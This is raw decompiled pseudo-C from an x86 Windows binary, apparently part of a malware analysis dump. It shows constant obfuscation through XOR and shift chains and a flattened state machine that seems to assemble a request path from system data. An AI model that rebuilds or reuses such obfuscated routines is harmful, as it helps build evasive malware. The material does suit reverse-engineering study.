				_t889 = __edx;
				_t892 = __ecx;
				_push( *((intOrPtr*)(_t902 + 0xc6c)));
				 *((intOrPtr*)(_t902 + 0x148)) = __edx;
				_push( *((intOrPtr*)(_t902 + 0xc6c)));
				 *((intOrPtr*)(_t902 + 0x12c)) = __ecx;
				_push(__edx);
				_push(__ecx);
				E00442550(_t669);
				 *((intOrPtr*)(_t902 + 0xe0)) = 0x50c;
				_t903 = _t902 + 0x14;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) ^ 0x43c2c0f0;
				_t899 = 0;
				_t795 = 0x2392656c;
				 *(_t903 + 0x128) = 0;
				_t776 = 3;
				 *(_t903 + 0xd0) =  *(_t903 + 0xcc) / _t776;
				 *(_t903 + 0xd0) =  *(_t903 + 0xd0) ^ 0x16964c14;
				 *(_t903 + 0xcc) = 0x7d6c;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) + 0xffff22e1;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) >> 3;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) ^ 0x1fffd9b4;
				 *(_t903 + 0x74) = 0xc1a1;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) << 7;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) | 0x752db8c7;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) ^ 0x756d9f65;
				 *(_t903 + 0x54) = 0x6653;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) | 0xef6ea2da;
				_t777 = 0x4f;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) * 0x2c;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) ^ 0xfdea2aeb;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) ^ 0xdae5ba81;
				 *(_t903 + 0x90) = 0x1ae0;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) + 0x9dd2;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) / _t777;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) ^ 0x00001273;
				 *(_t903 + 0x7c) = 0x91ad;
				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) + 0x8a7f;
				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) + 0xffff15ba;
				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) ^ 0x00003314;
				 *(_t903 + 0x118) = 0xd3f6;
				 *(_t903 + 0x118) =  *(_t903 + 0x118) >> 6;
				 *(_t903 + 0x118) =  *(_t903 + 0x118) ^ 0x00006a76;
				 *(_t903 + 0xdc) = 0x5b3d;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) << 7;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) ^ 0x002dec83;
				 *(_t903 + 0xe4) = 0xe1a3;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) + 0xb61a;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x00019054;
				 *(_t903 + 0xac) = 0xd034;
				_t778 = 0x41;
				 *(_t903 + 0xa8) =  *(_t903 + 0xac) * 0x21;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) >> 5;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0x0000a5df;
				 *(_t903 + 0x5c) = 0xce7d;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) << 0xb;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) + 0xffff4afa;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) / _t778;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) ^ 0x0019198d;
				 *(_t903 + 0x54) = 0xea37;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) * 0x7f;
				_t779 = 0x75;
				 *(_t903 + 0x58) =  *(_t903 + 0x54) / _t779;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0x6eec;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) ^ 0x00015ac8;
				 *(_t903 + 0x100) = 0xf0b;
				 *(_t903 + 0x100) =  *(_t903 + 0x100) >> 1;
				 *(_t903 + 0x100) =  *(_t903 + 0x100) ^ 0x000046ed;
				 *(_t903 + 0x98) = 0xe523;
				 *(_t903 + 0x98) =  *(_t903 + 0x98) >> 0xf;
				 *(_t903 + 0x98) =  *(_t903 + 0x98) + 0xbd6d;
				 *(_t903 + 0x98) =  *(_t903 + 0x98) ^ 0x0000db22;
				 *(_t903 + 0xf8) = 0xa379;
				 *(_t903 + 0xf8) =  *(_t903 + 0xf8) + 0xffffc366;
				 *(_t903 + 0xf8) =  *(_t903 + 0xf8) ^ 0x00004ea3;
				 *(_t903 + 0xc8) = 0x9609;
				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) | 0xfc9b1668;
				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) >> 2;
				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) ^ 0x3f26f1c9;
				 *(_t903 + 0x110) = 0x93e8;
				 *(_t903 + 0x110) =  *(_t903 + 0x110) ^ 0x6cc9c780;
				 *(_t903 + 0x110) =  *(_t903 + 0x110) ^ 0x6cc954eb;
				 *(_t903 + 0xc4) = 0x193a;
				_t780 = 0x59;
				 *(_t903 + 0xc4) =  *(_t903 + 0xc4) / _t780;
				_t781 = 0x1b;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc4) * 0x78;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) ^ 0x00004d55;
				 *(_t903 + 0x28) = 0x9917;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffff1acc;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) << 0xe;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) >> 1;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) ^ 0x767c70b9;
				 *(_t903 + 0x60) = 0x87fb;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) << 0xc;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) << 7;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) + 0x251d;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) ^ 0x3fd826f7;
				 *(_t903 + 0x80) = 0x50e5;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) >> 0xc;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) + 0xffff07fe;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) ^ 0xffff3d49;
				 *(_t903 + 0x90) = 0xf831;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) << 9;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) << 3;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) ^ 0x0f836fd5;
				 *(_t903 + 0x58) = 0xa7c7;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0xffff9b8f;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0xdad5;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) << 0xb;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) ^ 0x08f13b63;
				 *(_t903 + 0xb0) = 0x3244;
				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) | 0x63ae54c5;
				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) + 0xffffb71c;
				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) ^ 0x63ae2d72;
				 *(_t903 + 0x30) = 0x96f4;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) + 0xfffff5ad;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) / _t781;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0x2e666d06;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0x2e665524;
				 *(_t903 + 0x88) = 0xa705;
				 *(_t903 + 0x88) =  *(_t903 + 0x88) << 9;
				 *(_t903 + 0x88) =  *(_t903 + 0x88) + 0x9771;
				 *(_t903 + 0x88) =  *(_t903 + 0x88) ^ 0x014ee7b1;
				 *(_t903 + 0x48) = 0x3d5e;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0xffff4ae5;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) | 0x14fe6d6d;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) << 2;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) ^ 0xffffae8a;
				 *(_t903 + 0x11c) = 0x676a;
				_t782 = 0x3b;
				 *(_t903 + 0x120) =  *(_t903 + 0x11c) / _t782;
				 *(_t903 + 0x120) =  *(_t903 + 0x120) ^ 0x00006974;
				 *(_t903 + 0xbc) = 0x626d;
				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) + 0xc5ef;
				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) + 0xffff67d0;
				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) ^ 0x0000ba9c;
				 *(_t903 + 0x9c) = 0xc74f;
				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) ^ 0xf6981ca9;
				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) >> 9;
				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) ^ 0x007b070d;
				 *(_t903 + 0xd4) = 0xabeb;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) + 0xffff5ef9;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) >> 7;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x000061f9;
				 *(_t903 + 0x11c) = 0x4b6;
				_t783 = 0x58;
				 *(_t903 + 0x11c) =  *(_t903 + 0x11c) * 0x12;
				 *(_t903 + 0x11c) =  *(_t903 + 0x11c) ^ 0x000028b0;
				 *(_t903 + 0x80) = 0x3500;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) + 0xffff2fa1;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) * 0x6d;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) ^ 0xffbdaa6d;
				 *(_t903 + 0x44) = 0x660e;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffffa604;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffff1443;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffff2243;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) ^ 0xfffe0557;
				 *(_t903 + 0xfc) = 0x57ec;
				 *(_t903 + 0xfc) =  *(_t903 + 0xfc) / _t783;
				 *(_t903 + 0xfc) =  *(_t903 + 0xfc) ^ 0x0000115a;
				 *(_t903 + 0x30) = 0x1e40;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) + 0xd54d;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) << 0x10;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) << 0xc;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0xd00054ed;
				 *(_t903 + 0xa8) = 0x247b;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0xf4c628ae;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) << 4;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0x4c6080cc;
				 *(_t903 + 0xa0) = 0x874d;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x714f4b1a;
				_t784 = 0x12;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) / _t784;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x064b94f9;
				 *(_t903 + 0x108) = 0x5442;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) << 0xb;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) ^ 0x02a2423c;
				 *(_t903 + 0x40) = 0xc63;
				 *(_t903 + 0x40) =  *(_t903 + 0x40) | 0xcf27a650;
				 *(_t903 + 0x40) =  *(_t903 + 0x40) << 4;
				_t785 = 0x69;
				 *(_t903 + 0x3c) =  *(_t903 + 0x40) * 0x42;
				 *(_t903 + 0x3c) =  *(_t903 + 0x3c) ^ 0x83afb13c;
				 *(_t903 + 0xb4) = 0x9ee9;
				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) / _t785;
				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) ^ 0x2c71e887;
				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) ^ 0x2c71a0f8;
				 *(_t903 + 0xac) = 0xebb1;
				 *(_t903 + 0xac) =  *(_t903 + 0xac) + 0xffffa53b;
				 *(_t903 + 0xac) =  *(_t903 + 0xac) + 0x1487;
				 *(_t903 + 0xac) =  *(_t903 + 0xac) ^ 0x00009fba;
				 *(_t903 + 0x34) = 0xd0fd;
				_t786 = 0x5a;
				 *(_t903 + 0x38) =  *(_t903 + 0x34) * 0x48;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0x677b;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) * 0x39;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) ^ 0x0d2d2b78;
				 *(_t903 + 0xc0) = 0x7c5c;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) | 0xa19321e3;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) / _t786;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) ^ 0x01cbc5b7;
				 *(_t903 + 0x50) = 0x8c18;
				_t787 = 7;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) / _t787;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) << 0xc;
				_t788 = 0x1e;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) * 0x1c;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) ^ 0x23051aa0;
				 *(_t903 + 0x48) = 0x3d7;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0x6ad2;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0x792;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) / _t788;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) ^ 0x00005768;
				 *(_t903 + 0xf0) = 0xd2ba;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) << 3;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) ^ 0x00069d23;
				 *(_t903 + 0x114) = 0x19d1;
				 *(_t903 + 0x114) =  *(_t903 + 0x114) + 0xffff4333;
				 *(_t903 + 0x114) =  *(_t903 + 0x114) ^ 0xffff39ec;
				 *(_t903 + 0x6c) = 0x599b;
				_t789 = 0x61;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) / _t789;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x240846c0;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x24081360;
				 *(_t903 + 0x28) = 0xb43b;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffffc9d6;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffff5756;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) >> 0xe;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) ^ 0x00038714;
				 *(_t903 + 0x20) = 0x2b90;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) + 0x9fcd;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) >> 9;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) << 0xa;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) ^ 0x000194c5;
				 *(_t903 + 0x104) = 0xeacc;
				 *(_t903 + 0x104) =  *(_t903 + 0x104) << 0x10;
				 *(_t903 + 0x104) =  *(_t903 + 0x104) ^ 0xeacc46e0;
				 *(_t903 + 0x1c) = 0x2e68;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0x15408aca;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0xc28f26d4;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) + 0xffff2328;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0xd7cef55f;
				 *(_t903 + 0x78) = 0x4f9e;
				 *(_t903 + 0x78) =  *(_t903 + 0x78) >> 0xf;
				_t790 = 0xe;
				 *(_t903 + 0x74) =  *(_t903 + 0x78) / _t790;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) ^ 0x00003e82;
				 *(_t903 + 0x38) = 0xf8c3;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0xffff0aba;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0xffff96d9;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) * 0x36;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) ^ 0xffea86cf;
				 *(_t903 + 0xe8) = 0x47de;
				 *(_t903 + 0xe8) =  *(_t903 + 0xe8) ^ 0xd4f8af4a;
				 *(_t903 + 0xe8) =  *(_t903 + 0xe8) ^ 0xd4f89eb4;
				 *(_t903 + 0x20) = 0x65fb;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) >> 7;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) + 0xfffffa8d;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) * 0x56;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) ^ 0xfffe5494;
				 *(_t903 + 0x6c) = 0x64ca;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) + 0xffff11ba;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) + 0xc430;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x00005014;
				 *(_t903 + 0xa0) = 0x1b33;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) * 0x6c;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) | 0x1aa81449;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x1aab14e6;
				 *(_t903 + 0x108) = 0x9e77;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) | 0xd713dbbf;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) ^ 0xd713a936;
				 *(_t903 + 0xf0) = 0x6078;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) + 0xb979;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) ^ 0x00014992;
				 *(_t903 + 0xe4) = 0x5404;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x58bc0909;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x58bc1b10;
				 *(_t903 + 0xdc) = 0xf7f;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) >> 0xd;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) ^ 0x00005966;
				 *(_t903 + 0x64) = 0xb834;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) << 1;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) >> 0x10;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) >> 1;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) ^ 0x00004c5c;
				 *(_t903 + 0xd4) = 0x4bcc;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) * 0x53;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x69196900;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x69018755;
				 *(_t903 + 0x84) = 0xe13c;
				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0x2f0c4ec9;
				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0x8c1dd645;
				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0xa31179b0;
				_t791 =  *((intOrPtr*)(_t903 + 0x130));
				 *((intOrPtr*)(_t903 + 0x10)) =  *((intOrPtr*)(_t903 + 0x134));
				 *((intOrPtr*)(_t903 + 0x12c)) = _t791;
				while(1) {
					L1:
					_t865 =  *(_t903 + 0x14);
					while(1) {
						L2:
						_t908 = _t795 - 0x1ac77ed3;
						if(_t908 > 0) {
							goto L30;
						}
						L3:
						if(_t908 == 0) {
							_t890 = _t903 + 0x260;
							_t811 = 6;
							_t901 =  *(_t903 + 0x124) % _t811 + 1;
							__eflags = _t901;
							if(__eflags != 0) {
								__eflags = 1;
								do {
									_t897 = ( *(_t903 + 0x128) & 0x0000000f) + 4;
									E0044087B(_t890,  *((intOrPtr*)(_t903 + 0x130)),  *(_t903 + 0x90), _t897,  *((intOrPtr*)(_t903 + 0x4c)), 1, _t903 + 0x128,  *(_t903 + 0xf8));
									_t903 = _t903 + 0x18;
									_t891 = _t890 + _t897 * 2;
									_t775 = 0x2f;
									 *_t891 = _t775;
									_t890 = _t891 + 2;
									_t901 = _t901 - 1;
									__eflags = _t901;
								} while (__eflags != 0);
								_t791 =  *((intOrPtr*)(_t903 + 0x12c));
								_t892 =  *(_t903 + 0x120);
							}
							_t899 =  *(_t903 + 0x128);
							 *_t890 = 0;
							_t795 = 0x1da9be04;
							_t720 =  *((intOrPtr*)(_t903 + 0x10));
							_t889 =  *(_t903 + 0x140);
							goto L1;
						} else {
							_t909 = _t795 - 0x109a2717;
							if(_t909 > 0) {
								__eflags = _t795 - 0x11ab6705;
								if(_t795 == 0x11ab6705) {
									_push(_t903 + 0x138);
									_push( *(_t903 + 0x3c));
									_push(_t892);
									_t741 = E0043F9BA( *(_t903 + 0x7c));
									_t903 = _t903 + 0xc;
									_t795 = 0xcf94e74;
									__eflags = _t741;
									_t742 = 1;
									_t899 =  !=  ? _t742 : _t899;
									 *(_t903 + 0x128) = _t899;
									goto L16;
								} else {
									__eflags = _t795 - 0x13f4272a;
									if(_t795 == 0x13f4272a) {
										E0043DE81( *((intOrPtr*)(_t903 + 0x10c)),  *((intOrPtr*)(_t903 + 0x148)),  *(_t903 + 0xf0));
										_t795 = 0x1d56e0a8;
										goto L16;
									} else {
										__eflags = _t795 - 0x158b14ad;
										if(_t795 != 0x158b14ad) {
											goto L44;
										} else {
											E0043DE81( *((intOrPtr*)(_t903 + 0x70)),  *((intOrPtr*)(_t903 + 0x150)),  *(_t903 + 0xa0));
											_t795 = 0x13f4272a;
											goto L16;
										}
									}
								}
							} else {
								if(_t909 == 0) {
									_push(0x4314fc);
									_push( *(_t903 + 0x84));
									_push( *(_t903 + 0x68));
									_t745 = E00435DFC( *(_t903 + 0xcc),  *(_t903 + 0x34), __eflags);
									_t905 = _t903 + 0xc;
									_t881 =  *( *0x45108c + 0x24);
									_push(_t881[3] & 0x000000ff);
									_push(_t745);
									_push(_t881[1] & 0x000000ff);
									_push( *_t881 & 0x000000ff);
									_push( *((intOrPtr*)(_t905 + 0x12c)));
									_push( *((intOrPtr*)(_t905 + 0x5c)));
									_push(( *( *0x45108c + 0x24))[2] & 0x000000ff);
									_push( *((intOrPtr*)(_t905 + 0xa4)));
									_push( *((intOrPtr*)(_t905 + 0x50)));
									_push( *((intOrPtr*)(_t905 + 0xd4)));
									_push( *((intOrPtr*)(_t905 + 0x80)));
									_push( *((intOrPtr*)(_t905 + 0xbc)));
									_t882 = 0x40;
									E004398C5(_t882, __eflags);
									E00440D6D( *((intOrPtr*)(_t905 + 0xf0)),  *((intOrPtr*)(_t905 + 0xd0)),  *((intOrPtr*)(_t905 + 0x104)), _t745);
									_t903 = _t905 + 0x38;
									_t795 = 0x1ac77ed3;
									_t865 = ( *( *0x45108c + 0x24))[4] & 0x0000ffff;
									_t720 =  *((intOrPtr*)(_t903 + 0x10));
									 *(_t903 + 0x14) = ( *( *0x45108c + 0x24))[4] & 0x0000ffff;
									goto L14;
								} else {
									if(_t795 == 0xb3bcfc8) {
										E00447187(_t903 + 0x148, _t903 + 0x1e4, _t903 + 0x14c);
										_pop(_t826);
										asm("sbb ecx, ecx");
										_t795 = (_t826 & 0x278b1eba) + 0x13f4272a;
										goto L16;
									} else {
										if(_t795 == 0xc2454b8) {
											_push( *(_t903 + 0xd4));
											_t828 =  *(_t903 + 0x68);
											goto L48;
										} else {
											if(_t795 == 0xcf94e74) {
												E0043DE81( *((intOrPtr*)(_t903 + 0xec)),  *(_t903 + 0x13c),  *(_t903 + 0x20));
												_t795 = 0x158b14ad;
												L16:
												_t720 =  *((intOrPtr*)(_t903 + 0x10));
												while(1) {
													L1:
													_t865 =  *(_t903 + 0x14);
													goto L2;
												}
											} else {
												if(_t795 != 0xdea8839) {
													L44:
													__eflags = _t795 - 0x32f4d51e;
													if(__eflags != 0) {
														while(1) {
															L1:
															_t865 =  *(_t903 + 0x14);
															goto L2;
														}
													}
												} else {
													_push(_t795);
													_push( *((intOrPtr*)(_t889 + 4)));
													_t894 = E0043A143(_t795);
													_t906 = _t903 + 8;
													_t791 = E004354FB(_t762);
													 *((intOrPtr*)(_t906 + 0x130)) = _t791;
													_t914 = _t791;
													if(_t791 != 0) {
														_t720 = E00435418( *((intOrPtr*)(_t906 + 0xe8)),  *((intOrPtr*)(_t906 + 0xf0)), _t914, _t894,  *((intOrPtr*)(_t906 + 0xb4)),  *_t889,  *((intOrPtr*)(_t889 + 4)), _t791);
														_t903 = _t906 + 0x14;
														 *((intOrPtr*)(_t903 + 0x10)) = _t720;
														if(_t720 == 0) {
															_push( *(_t903 + 0x54));
															_t828 =  *(_t903 + 0x60);
															L48:
															E0043DE81(_t828, _t791);
														} else {
															_t795 = 0x37dee1aa;
															L13:
															_t865 =  *(_t903 + 0x14);
															L14:
															_t892 =  *(_t903 + 0x120);
															L2:
															_t908 = _t795 - 0x1ac77ed3;
															if(_t908 > 0) {
																goto L30;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						L49:
						return _t899;
						L30:
						__eflags = _t795 - 0x1d56e0a8;
						if(_t795 == 0x1d56e0a8) {
							E0043DE81( *(_t903 + 0xe8),  *((intOrPtr*)(_t903 + 0x134)),  *(_t903 + 0xdc));
							_t795 = 0xc2454b8;
							goto L44;
						} else {
							__eflags = _t795 - 0x1da9be04;
							if(__eflags == 0) {
								E00448A33(_t903 + 0x1e0, _t889, __eflags);
								_t795 = 0x2ba7081d;
								goto L16;
							} else {
								__eflags = _t795 - 0x2392656c;
								if(_t795 == 0x2392656c) {
									 *(_t903 + 0x124) = E0043A156();
									_t795 = 0xdea8839;
									goto L16;
								} else {
									__eflags = _t795 - 0x2b46f7ec;
									if(_t795 == 0x2b46f7ec) {
										E0044AA7B(_t903 + 0x138,  *(_t903 + 0xcc),  *(_t903 + 0x110), _t903 + 0x144);
										_pop(_t801);
										asm("sbb ecx, ecx");
										_t795 = (_t801 & 0xf343466f) + 0x1d56e0a8;
										goto L16;
									} else {
										__eflags = _t795 - 0x2ba7081d;
										if(__eflags == 0) {
											_push(0x43154c);
											_push( *(_t903 + 0x108));
											_push( *((intOrPtr*)(_t903 + 0xa4)));
											_t726 = E00435DFC( *(_t903 + 0x38),  *(_t903 + 0xb0), __eflags);
											_t904 = _t903 + 0xc;
											E0044BAEC(0x400, __eflags,  *((intOrPtr*)(_t904 + 0xd0)), _t726, _t904 + 0x270,  *((intOrPtr*)(_t904 + 0xbc)),  *((intOrPtr*)(_t904 + 0x40)), _t904 + 0x468, _t904 + 0x1e4, _t904 + 0x160);
											E00440D6D( *((intOrPtr*)(_t904 + 0xe4)),  *((intOrPtr*)(_t904 + 0x74)),  *((intOrPtr*)(_t904 + 0x68)), _t726);
											_t720 =  *((intOrPtr*)(_t904 + 0x38));
											_t903 = _t904 + 0x28;
											_t795 = 0xb3bcfc8;
											goto L13;
										} else {
											__eflags = _t795 - 0x37dee1aa;
											if(_t795 == 0x37dee1aa) {
												 *((intOrPtr*)(_t903 + 0x160)) = _t720;
												 *((intOrPtr*)(_t903 + 0x15c)) =  *((intOrPtr*)(_t903 + 0xc68));
												_t807 =  *(_t903 + 0x104);
												 *((intOrPtr*)(_t903 + 0x164)) = _t791;
												E00437B39(_t807,  *(_t903 + 0x98), _t903 + 0x15c, _t903 + 0x134,  *((intOrPtr*)(_t903 + 0xf4)));
												_t903 = _t903 + 0xc;
												asm("sbb ecx, ecx");
												_t795 = (_t807 & 0x1f22a334) + 0xc2454b8;
												goto L16;
											} else {
												__eflags = _t795 - 0x3b7f45e4;
												if(_t795 != 0x3b7f45e4) {
													goto L44;
												} else {
													 *(_t903 + 0x13c) =  *(_t903 + 0x13c) & 0x00000000;
													 *(_t903 + 0x140) =  *(_t903 + 0x84);
													_t809 =  *(_t903 + 0x110);
													E00447BBE(_t903 + 0x488, _t903 + 0x15c,  *((intOrPtr*)(_t903 + 0x130)), _t903 + 0x27c, _t865, _t903 + 0x158,  *(_t903 + 0x78),  *(_t903 + 0x30),  *((intOrPtr*)(_t903 + 0x24)), _t903 + 0x164,  *(_t903 + 0x100));
													_t903 = _t903 + 0x28;
													asm("sbb ecx, ecx");
													_t795 = (_t809 & 0xfc205258) + 0x158b14ad;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
						goto L49;
					}
				}
			}

0x00438008
0x0043800f
0x00438011
0x00438013
0x0043801a
0x00438021
0x00438028
0x0043802f
0x00438030
0x00438031
0x00438036
0x00438041
0x00438044
0x00438058
0x0043805a
0x0043805f
0x00438068
0x0043806d
0x00438076
0x00438081
0x0043808c
0x00438097
0x0043809f
0x004380aa
0x004380b2
0x004380b7
0x004380bf
0x004380c7
0x004380cf
0x004380dc
0x004380df
0x004380e3
0x004380eb
0x004380f3
0x004380fe
0x00438114
0x0043811b
0x00438126
0x0043812e
0x00438136
0x0043813e
0x00438146
0x00438151
0x00438159
0x00438164
0x0043816f
0x00438177
0x00438182
0x0043818d
0x00438198
0x004381a3
0x004381b6
0x004381b7
0x004381be
0x004381c6
0x004381d1
0x004381d9
0x004381de
0x004381ec
0x004381f0
0x004381f8
0x00438205
0x00438211
0x00438216
0x0043821c
0x00438224
0x0043822c
0x00438237
0x0043823e
0x00438249
0x00438254
0x0043825c
0x00438267
0x00438272
0x0043827d
0x00438288
0x00438293
0x0043829e
0x004382a9
0x004382b1
0x004382bc
0x004382c7
0x004382d2
0x004382dd
0x004382ef
0x004382f4
0x00438305
0x00438306
0x0043830d
